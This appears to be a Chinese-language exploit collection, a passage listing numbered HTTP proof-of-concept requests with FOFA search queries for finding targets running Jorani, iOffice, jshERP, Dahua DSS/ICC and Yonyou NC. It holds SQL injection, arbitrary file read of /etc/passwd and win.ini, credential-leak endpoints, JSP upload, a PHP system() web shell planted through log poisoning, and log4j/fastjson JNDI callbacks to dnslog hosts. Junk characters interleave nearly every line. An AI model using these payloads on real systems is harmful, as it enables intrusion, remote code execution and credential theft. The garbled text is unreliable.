) u" }2 G2 e0 g2 a, {3 `GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.15 ?3 H, h& u0 [7 r/ t
Host: 127.0.0.1
+ H O# j. r E1 u8 @Pragma: no-cache
$ W6 A& R: t) ^, r* k' S$ I/ TCache-Control: no-cache
. _" n- @- Z% ?# Q, G0 V8 g5 \0 q" EUpgrade-Insecure-Requests: 1% _5 ?/ t2 t8 T6 o- R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% p2 o3 v1 [2 C3 M& D6 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! E" B9 Q- h! n- n+ NAccept-Encoding: gzip, deflate
. o1 y$ C( n3 e! HAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
# v) M; K4 U0 G9 x% M% S" A3 XConnection: close$ Q4 J+ j# w9 L" L9 }- N0 M
4 O: k: ` S7 w
4 E3 _8 T8 u' N$ y2 X2 K+ Z12. Jorani < 1.0.2 远程命令执行7 f1 M6 `! M1 B
FOFA:title="Jorani"
& w( j( I2 y! ^( n; {( w$ o第一步先拿到cookie2 u) c3 r, x& M2 J
GET /session/login HTTP/1.1! I( ?. r5 {8 Y2 n+ o8 x
Host: 192.168.190.30
% o2 e, F0 U1 c5 P& d! Y, w/ UUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36$ X- i5 ]' X2 B: R7 r
Connection: close
9 O9 i2 F; O2 m- u1 R: O. P* HAccept-Encoding: gzip
! _! ^' P4 d1 v4 Z! i5 y0 X& n4 _; T; M, k( Y
$ C2 D; c/ W7 I% p响应中csrf_cookie_jorani用于后续请求" L% X( {/ G( J2 l, N6 z& l
HTTP/1.1 200 OK3 L n6 i. }% I4 Z+ s
Connection: close* o: H* d7 l- ^5 _
Cache-Control: no-store, no-cache, must-revalidate
: i, N$ F) m$ C5 kContent-Type: text/html; charset=UTF-8
2 l$ L3 v' o% J0 g% jDate: Tue, 24 Oct 2023 09:34:28 GMT- d, W5 V0 R1 z8 e3 R# i
Expires: Thu, 19 Nov 1981 08:52:00 GMT0 G @& e' W0 ]3 N) e( L
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
/ `# i3 z0 ^9 h% a2 y5 yPragma: no-cache" S* ` R5 s. G+ i: T" l
Server: Apache/2.4.54 (Debian)
0 y& L% s! R z3 s# rSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
. h `0 R7 C1 U6 l) RSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly/ y- ?" Q* D/ k: Y. Z* Y; O
Vary: Accept-Encoding
* W' }9 T" ]( w6 O9 h D7 E$ e7 c: X" H4 J0 @/ K7 I
4 I/ E& i( x5 }6 v6 ?& J0 C
POST请求,执行函数并进行base64编码7 i) [: X0 l7 b2 T# k& T3 b) E
POST /session/login HTTP/1.1. E6 P7 ^1 ]' m, q7 a$ R5 u: }+ M
Host: 192.168.190.30
?# y' u7 _# q c4 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36( g2 P" n9 u- r9 K& h) N' R3 n
Connection: close0 |, M7 } L D5 ?& P, A% s
Content-Length: 2523 ?; V% t8 j. v; g* ~9 n$ m- p" D
Content-Type: application/x-www-form-urlencoded5 y6 E; Y+ R: o5 k
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 i0 B8 ?1 M6 h% ]! SAccept-Encoding: gzip3 `+ O9 w! H6 d$ J
+ z4 T3 `$ [9 ^8 V
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
0 j) u4 z( n5 T8 O& k9 f4 j2 f9 G) X( F9 {; [5 E
& S, Q* c5 }' e7 i
# E+ _5 T- ^3 M& q向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串& c- c6 C- k5 W0 u2 D4 m" p8 L
GET /pages/view/log-2023-10-24 HTTP/1.1
+ b. y9 s) r, j% w- N6 pHost: 192.168.190.30
! O* S* t$ f5 P6 C: N* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ E+ V* B7 Q5 q" G1 I- M- F
Connection: close
6 G3 H0 n' O- {. wCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
4 n* _, y' a: t) O2 HK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
% m3 g" y9 E3 F' h" j0 ?/ iX-REQUESTED-WITH: XMLHttpRequest" D' K# f8 A" Q# P) }, M0 X
Accept-Encoding: gzip: P# C% n7 s% P9 Y
2 }) d# C0 D# u7 o7 O
. l* |+ e7 f7 l
13. 红帆iOffice ioFileDown任意文件读取
) k. `# Y9 J. V2 p4 J* CFOFA:app="红帆-ioffice"
# C: g5 g I* Y BGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.14 E7 G- U, P U5 B$ Z
Host: x.x.x.x3 b: k2 c. C- Z% ]; G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' k9 u; Y( r1 m: K: YConnection: close
" d9 h9 G. u. B* V# \Accept: */*
3 C* ~7 q8 `& B: K2 G% g. NAccept-Encoding: gzip4 e9 t% l- R+ f; m% ]( g `( W
3 I4 W- Z; c' _1 v0 L- @( P) J2 d$ [
14. 华夏ERP(jshERP)敏感信息泄露4 P7 O' b" j0 q7 f2 j& @
FOFA:body="jshERP-boot"# q: _& N9 D# z; }7 [" {" q+ w
泄露内容包括用户名密码0 H% X& Z1 U: r5 |
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
; Z. [. E6 ~& G% V# r- S2 OHost: x.x.x.x* |) \ ]+ Q* H9 x; M4 b0 L- X" f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) L; g& c$ \3 M& r4 N8 f5 `9 l8 P9 @Connection: close& e- F# Q6 U- N7 I. X& {
Accept: */*: h% m% i! w' Q* n: J( P- @' i$ w* q
Accept-Language: en- ~+ i h& f! _# N5 {$ v
Accept-Encoding: gzip, S8 ~1 `1 Q8 J& ]# h" K2 c5 z
3 V x: D$ O- e0 U- g
3 o3 X7 ~8 }! P! f0 Z. v
15. 华夏ERP getAllList信息泄露# Y! q5 G1 V* Q+ M* K
CVE-2024-0490% M" W2 l j8 o( d
FOFA:body="jshERP-boot"2 o4 W7 r2 W4 A6 [9 ]
泄露内容包括用户名密码9 ]4 r7 ]& O& ~$ _
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.17 H, P$ D6 w+ G! \# O" }
Host: 192.168.40.130:1008 k0 e, m$ Z( v4 b) [$ N2 L; M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36) w" `3 g: N+ S
Connection: close
; L" U0 g$ R* WAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
; ~4 S+ J# X6 f/ wAccept-Language: en
) H5 _$ X' y% M, lsec-ch-ua-platform: Windows
3 A8 t0 Q0 G% F9 Q( S% _Accept-Encoding: gzip
9 o5 F9 V0 c3 Y/ P5 z. X. ^$ }
/ U. t* j. J2 u0 ^' e V3 \# U# C8 T: R
16. 红帆HFOffice医微云SQL注入' {5 d4 z, {: s; C
FOFA:title="HFOffice". ~6 I; d4 I! |) _1 x: a0 M
poc中调用函数计算1234的md5值7 A9 R) w; q+ ^" s
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 L. u! B3 w, P' u4 V
Host: x.x.x.x+ V7 P* q; E, m. ^% v% w1 b
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' q* k9 q ? ]Connection: close
# m$ [+ T3 y& Y5 L4 EAccept: */*
/ y9 l8 U% Q' @5 _Accept-Language: en2 L! E: S: n! Z2 n4 g4 b; J/ d
Accept-Encoding: gzip: l9 N2 i! @. [
2 f# B! A" P2 k7 [6 ~. O6 D' H
17. 大华 DSS itcBulletin SQL 注入
3 A! { H# F- VFOFA:app="dahua-DSS"
3 r) L) ^/ h$ G; l* V5 vPOST /portal/services/itcBulletin?wsdl HTTP/1.1+ }6 M7 }$ a, ]5 w# Z( Y
Host: x.x.x.x
! }- N# K4 @# J: O, t' a4 f: wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 X& }3 Z: g u; ]: U
Connection: close
3 Q6 k4 y9 J" i+ \5 U1 J9 B+ }Content-Length: 345
3 f. l) v7 S% S% X& @1 \Accept-Encoding: gzip+ b' p; X1 z5 ]8 s: \
; N; O. L6 z+ T2 ~4 }1 Y
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
" |4 ^1 C2 ^5 _5 U( o1 n9 S, A" t<s11:Body>
& ]7 Q* V0 }# O4 J" M0 ^ <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
) P: e, t: \3 Q X- [4 R <netMarkings>
3 e9 P1 _# n9 v I% m ~9 r& I2 X* O1 C (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
9 h. D8 B0 g8 r3 ^ </netMarkings>0 d; C. A4 M9 P- ^- s* x, X3 g# j/ n0 y: O
</ns1:deleteBulletin>& T- y K! X+ n) ?) k N! R1 j
</s11:Body># S9 {2 L- ~* K& h P# \. q5 ]
</s11:Envelope>$ Z, w# `/ w' w
9 o8 [ N J2 q; `- o$ d3 c0 \4 d+ O, d9 e5 b- A( i
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- l! f8 z4 }# MFOFA:app="dahua-DSS"
1 m9 Q# i7 T7 U/ `% vGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# ]2 b, `* d D% t8 [
Host: your-ip
$ @4 U3 ^0 n$ k2 Q) |# WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
w3 j' s8 `( P8 WAccept-Encoding: gzip, deflate& U) F+ s# r- L
Accept: */*
( F0 N5 k9 F' oConnection: keep-alive
0 R b4 D# u( g( h# {, X, y: P
3 a% }9 r; @5 I( E
$ j8 ]+ K! V+ R" n+ _
/ n! O0 m5 [9 C: X' F+ }2 i19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 a. m H8 b+ w0 w& v/ h# z/ N
FOFA:app="dahua-DSS"
4 }1 M2 o7 |) e CGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
. ? Q3 H5 v' ~( k6 f# YHost:
4 p" y& {& d3 [6 \7 WUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, U+ B3 j; g5 e$ ?, PAccept-Encoding: gzip, deflate
4 w# E7 |% r/ d4 [7 t9 h: xAccept: */*
1 D. k0 m2 n+ H" ~1 U# SConnection: keep-alive
& ~% f0 n, P! i# @0 L* G8 z
I8 R4 D, d6 x6 G2 l; Q( q! y0 w- J! L/ L, m! X
20. 大华ICC智能物联综合管理平台任意文件读取8 K7 g6 R5 |2 t) ]) N4 r! z% [- s
FOFA:body="*客户端会小于800*"
0 J* s5 I( @" v. a, r! K; sGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 u: J2 `* o0 M, `Host: x.x.x.x3 ]* m! P4 T8 a. s) F2 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 Q$ M$ N: l: i% D9 Y5 {
Connection: close# Z8 E* i5 a- i7 ?' C& i. H+ f% Y
Accept: */** I* E! ^8 m5 F0 Z# Z& g
Accept-Language: en( B8 Q; U6 K9 n9 p4 J$ a' q
Accept-Encoding: gzip
; g7 d3 P" U( M: f! i; }* `
- }* [3 }: k, F J+ J
l6 r. ?1 q) S21. 大华ICC智能物联综合管理平台random远程代码执行
S7 U/ O9 J& x2 L/ o6 m3 t! bFOFA:icon_hash="-1935899595"
" ?9 c2 `* Z, @POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 C. n, J y1 I( N; ^. j
Host: x.x.x.x( D; X7 i9 b7 G6 [' Z3 o' [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ u" B ^# Z8 r( p5 r1 fContent-Length: 161
* D) N1 F6 F; c( m% a# ~, XAccept-Encoding: gzip" Y& S& I+ T/ K2 f( V z" a
Connection: close8 X5 d8 e8 Q& ]
Content-Type: application/json;charset=utf-8" K1 h/ w: q" c4 g4 M
' w0 d# G0 r! \, e$ T+ |6 w4 y% S% {{& |+ ^: {) P3 N, N& M( Y
"a":{
f+ M: {0 `- V; [2 z! c' H/ k "@type":"com.alibaba.fastjson.JSONObject",
2 o4 ?9 u4 O1 A; ^9 }( s& v D W) C {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
2 G/ P- X6 o" D; j. K }"". d- d+ ~2 r: s2 R$ R, J$ x7 x9 I: f
}8 ]; B0 Y$ c1 \. L# |% }7 w
- f' O" V) e6 K5 |
3 m* g: ~% f4 ^' t2 v3 B% U22. 大华ICC智能物联综合管理平台 log4j远程代码执行" E% [3 n: |" }- I
FOFA:icon_hash="-1935899595"
, b4 |, l7 ^2 y" b2 v: UPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1- u1 S& f8 ~2 H- F: v8 d) s5 M
Host: your-ip; [& q$ X; x6 i. {& `2 a7 B& V0 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 t) M q, F5 uContent-Type: application/json;charset=utf-8
* F( Q/ n7 U \; x0 q1 s5 M1 m) n M: D' Z
{" |$ @0 P. U4 A- K9 |: V, c
"loginName":"${jndi:ldap://dnslog}"9 J' O ^3 a) Y' f, Q% f2 g- x5 h
}/ ]& ?' w7 }5 v, V; K. D0 t
' I) G! i9 p, L+ |7 X F% x
/ K6 q1 f7 ^% e
% T" T4 {8 [# p23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
8 n# F* o8 Z( M: q* l# R# MFOFA:icon_hash="-1935899595"$ {9 }8 |8 d; ]! I( N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
8 P7 h; ^& i0 ]$ b7 {. L% p9 y/ wHost: your-ip* G; S) e! F3 p% a4 Y" Q! g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% \1 a5 Q7 z, {* Z; DContent-Type: application/json;charset=utf-80 H6 V: d+ v- |5 T
Accept-Encoding: gzip! v# g& `: M% f# R
Connection: close1 i2 z( V. | h
6 @, ~- d& C4 p7 q* e
{
{( ]$ m! q0 Q4 B$ h1 D "a":{
1 L8 C1 r* h h- U "@type":"com.alibaba.fastjson.JSONObject",
% q: X8 B; m' \% P5 M: V {"@type":"java.net.URL","val":"http://DNSLOG"}( v. ^, j' _7 v p9 ~+ F# S' m
}""3 T0 N8 U3 [) t" b8 E
}
* E( o6 _- K! U* S
$ M6 H( X* E8 U6 d
/ }! q w* f4 R& {% n# a24. 用友NC 6.5 accept.jsp任意文件上传
6 _2 f3 ~/ q& d" f5 N% aFOFA:icon_hash="1085941792"% _0 Z! k9 X. Y/ q( { V
POST /aim/equipmap/accept.jsp HTTP/1.1
) q9 S- F+ ?# W, I+ @3 hHost: x.x.x.x4 L/ K `/ N/ p3 G$ ^0 m
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 f, v& ~& A, ZConnection: close
+ @7 `' V2 x$ LContent-Length: 449 A2 U# W! N' E) \
Accept: */*
3 M. H' X+ c4 x8 UAccept-Encoding: gzip$ ]8 D# y/ W; F$ w$ _
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ ]8 Q; z4 P% B# V: p
( u( s" |6 K% _ \. S7 O. D9 U* O# Z* L, N-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 S! t8 e& N! J! B% n4 @
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
0 U9 j2 t" g; D+ eContent-Type: text/plain. g% g& z8 j+ Q9 i1 v3 S& k; x; h
$ _5 e$ p0 B- w4 O& X+ K<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
8 ?, I2 d! B& `7 i) K-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ ^+ |- a5 B0 F& B2 `Content-Disposition: form-data; name="fname"
F8 x7 \6 o- o0 t+ G: o& V2 y/ e! C1 `& M
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp, Z* k* V t! ?& `6 o. {* k# y3 [0 x
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--5 I' z2 e% L0 o. G' B% {* g0 q
! g/ S# V" e8 B0 A
/ `0 N+ p. Y" [! i s% `25. 用友NC registerServlet JNDI 远程代码执行& @ ~1 E1 Y0 T& j6 [# P* C/ z# f
FOFA:app="用友-UFIDA-NC" z& B5 O" i- ^
POST /portal/registerServlet HTTP/1.1& i7 I8 P3 Q6 S$ V; n( d0 U: P
Host: your-ip
! b: U$ b# X& l( @4 l" }) ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
2 U: |" P* }" L! @( jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 w) [" P2 c- {, m5 b, D1 lAccept-Encoding: gzip, deflate
5 a6 Q% O5 r2 D3 T3 H2 XAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
1 e- O/ e" _- T, ]Content-Type: application/x-www-form-urlencoded
9 O. X: z6 ], T% ]7 ~; c& R3 \0 Q: v* w" G# I
type=1&dsname=ldap://dnslog- k* B' g" I _/ ^
% f" n8 t" x7 P8 x0 q
! J0 }$ S% t! w# Z1 m4 j G y3 v4 b0 s- J3 c s6 ]( q
26. 用友NC linkVoucher SQL注入
! t# P( U1 S; A3 x# A/ E5 l' ?FOFA:app="用友-UFIDA-NC"
& X% b l) ?, V R. ]: V: O4 ZGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1( ]; _4 e- I7 E3 g+ H6 V
Host: your-ip4 ?" u+ Z! ?% ~$ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 h3 O6 G$ Q( F! w( @Content-Type: application/x-www-form-urlencoded; ]. J( I7 o6 M2 q0 v: V' V
Accept-Encoding: gzip, deflate/ Z4 _2 D/ c. p* g/ r
Accept: */*
l+ o* Z4 @4 S4 H- p- fConnection: keep-alive/ U G& A1 L$ B1 \
) L: i4 f2 a0 O2 d; n
1 [: v+ d/ U/ e K27. 用友 NC showcontent SQL注入
6 ?4 R: x. u% \FOFA:icon_hash="1085941792": @; \, p3 X! A( ?8 d
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1. K2 a0 V4 o! S4 u
Host: your-ip
2 O C- I& r6 G* b1 w9 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 C+ x, k* u, H( G+ }Accept-Encoding: identity5 q6 m7 L; q; b9 [; g
Connection: close
( M1 N9 E1 W7 H" ^, hContent-Type: text/xml; charset=utf-8
( |& }. r4 p& l( @4 R0 ?. S/ n# ^% h7 J
& _) z% S9 R0 r7 `5 x
28. 用友NC grouptemplet 任意文件上传0 G& C6 [$ r/ X7 O; ~
FOFA:icon_hash="1085941792"
6 M3 j, E9 I: u0 ePOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
: r( Y5 l# y6 q; U0 S! {Host: x.x.x.x
3 _5 V3 c& [$ v8 v* T! U5 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 R! v/ N+ G9 g! k$ O3 M6 tConnection: close
7 v3 g$ X, [+ m- w* zContent-Length: 268
6 ~( l8 o+ u# \# E1 p1 [+ |# S/ kContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
3 l% l- q6 y) e' n2 {Accept-Encoding: gzip+ Q6 o4 e/ j' E5 i
% k- E' j5 d0 c% r* A
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk$ q+ e& q/ Q; T8 C9 O
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp": a s: g( k' K+ E
Content-Type: application/octet-stream1 L* Q" i/ a! [# _
. y! n$ J7 }: T: I+ s& G
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
6 q7 u5 F& |! u: z/ @- A; V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 O+ q8 G$ Z9 Z5 M
$ v, _- V- Z) y4 V3 o1 c
0 Z2 s6 B+ g. P/uapim/static/pages/nc/head.jsp7 M2 r7 ^+ M4 Y. i% O6 [
8 O& a0 ?+ C8 L8 R29. 用友NC down/bill SQL注入
, K% ^1 s8 x$ n; ?FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ H) |6 J" E" O" |! `: M
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. u0 b- [9 \' }" K [* UHost: your-ip- d: y! {5 _1 T5 J; ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, t) ]2 b1 b- S7 u% o
Content-Type: application/x-www-form-urlencoded
0 L1 d0 N/ H5 h; ?4 s" {" T' l/ HAccept-Encoding: gzip, deflate
, c5 [/ E6 `1 K! J1 nAccept: */*
% C( Q# [" X0 q4 fConnection: keep-alive5 g/ a: o ^, i" `7 J
* z# B+ T9 e2 ^+ E8 D7 I% |. O' X
# ` ?$ T" a2 P
30. 用友NC importPml SQL注入
, G4 \# Y8 j( |8 _- F$ D7 CFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"- `; I* R5 ~. V; e
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.12 E- K# c( J9 t# G
Host: your-ip7 u- E% u' l7 o" d$ ]& Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V7 }- m& S _! B' D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
& U! y2 Z4 r% N+ ^. n- vConnection: close
+ n* z, N- ]- A; s
0 \$ V$ ]1 o- T------WebKitFormBoundaryH970hbttBhoCyj9V1 N' R8 W5 J2 L2 ?) u
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 R& p- H c6 L$ {Content-Type: image/jpeg, g/ u5 Y3 |0 Z; m5 V- P5 q
------WebKitFormBoundaryH970hbttBhoCyj9V--
% D9 ^' f( j1 B/ Z' F0 g& u: p7 u
* V6 k! D9 q1 @4 ? I1 M7 M, c1 a% Z6 i- H$ e+ w) s3 h: y
31. 用友NC runStateServlet SQL注入* M x' C+ G, x8 v4 E9 G/ r
version<=6.5
3 ^" R+ |7 f7 ^$ \FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% V. B7 S' j" M1 M
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.12 I: q. `. E7 U* f8 M: B8 ~
Host: host
4 |& P: p$ W4 _; b B7 ?6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( V S$ z# w; k$ ~7 |; J! A+ u
Content-Type: application/x-www-form-urlencoded
u" s$ f$ M s, l& M9 u3 f* T1 p0 p7 ]! Z0 ] Z
# B& `, @) b. h: M7 y6 }0 B32. 用友NC complainbilldetail SQL注入
) j5 `8 E0 q2 Q+ b, F$ Yversion= NC633、NC65& r( }9 {$ A# n
FOFA:app="用友-UFIDA-NC"+ L3 E o$ v* T2 g
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. Q/ O7 r+ w" ~; N5 _: G# B) nHost: your-ip( v( M: O- e, u, J8 s" k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 C e+ L/ |: F. s' p" O+ F
Content-Type: application/x-www-form-urlencoded1 M& ?% U; a) b8 b
Accept-Encoding: gzip, deflate
5 r% l4 ?/ n/ r% u. p. OAccept: */*
) R, Q- l2 [) X) k1 FConnection: keep-alive0 `. `# N9 ~; m2 h2 A* h4 E Y
4 a3 E; X' q* ^3 j
& K* P+ u$ f5 {
33. 用友NC downTax/download SQL注入
9 I1 O' R: l+ t. \" [8 r9 Rversion:NC6.5FOFA:app="用友-UFIDA-NC"
O/ B0 w2 u5 H% e; w }GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
; v8 V) P8 l: L8 v8 l# IHost: your-ip
8 e: G, R1 C4 ~+ D- aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! }' o. ^# U. Q0 ]6 G" ~
Content-Type: application/x-www-form-urlencoded2 q3 J1 I/ a2 {* E4 R. l
Accept-Encoding: gzip, deflate
& r$ i: V5 ^3 DAccept: */*
. I: A; a% x- O5 U! U6 E$ MConnection: keep-alive
@! U* G9 o2 U( e, R# _; C: [. f9 d, x/ I3 W( [
) l0 O+ V# x# p34. 用友NC warningDetailInfo接口SQL注入 _) B- q5 @9 D/ N/ g, O$ Q- O1 \
FOFA:app="用友-UFIDA-NC"
1 Q# L% J1 k3 N2 {+ JGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.12 \% x! I1 _/ Q5 i6 X
Host: your-ip
- J& m9 B* X* L! v, a# x( G& b) gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 x( M2 s6 e( }0 k4 N" s
Content-Type: application/x-www-form-urlencoded1 C' `6 s7 N' e' L; _/ @
Accept-Encoding: gzip, deflate
& u3 ?$ V5 M5 ]* BAccept: */*
. P$ e. L% E/ k6 f. m, G+ LConnection: keep-alive
' T$ x1 f/ T- L0 j, a5 A j5 b# Q
& w6 J, q+ s% O$ H. W" w3 I: T1 ^% U2 F" ]& F7 u
35. 用友NC-Cloud importhttpscer任意文件上传
" S Z! p5 L/ u2 O+ YFOFA:app="用友-NC-Cloud"
$ Y% D. A6 s0 K8 x: kPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
